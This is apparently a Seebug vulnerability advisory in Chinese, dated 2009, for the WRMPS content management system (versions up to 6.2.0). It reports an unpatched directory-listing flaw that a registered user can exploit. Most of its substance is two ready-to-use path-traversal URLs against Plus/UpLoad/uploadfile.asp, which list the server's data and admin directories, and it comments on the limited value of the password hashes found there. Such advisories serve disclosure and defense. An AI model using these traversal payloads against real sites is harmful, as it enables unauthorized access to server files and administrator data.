网人信息发布系统(WRMPS) 注册列目录漏洞

2009-11-17T00:00:00
ID SSV:12649
Type seebug
Reporter Root
Modified 2009-11-17T00:00:00

Description

WRMPS 是一个高效的内容管理解决方案,是数十万地方生活门户、行业门户及分类信息站点首选技术品牌!

注册 - 列目录

Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/data Plus/UpLoad/uploadfile.asp?Type=1&User=1&dir=...././/...././/admin 这个利用不大 ,密码只取MD5前十位.

WRMPS =< v 6.2.0 暂无,等待官方补丁 http://www.wangren.net/

                                        
                                            
                                                Plus/UpLoad/uploadfile.asp?Type=1&amp;User=1&amp;dir=...././/...././/data
Plus/UpLoad/uploadfile.asp?Type=1&amp;User=1&amp;dir=...././/...././/admin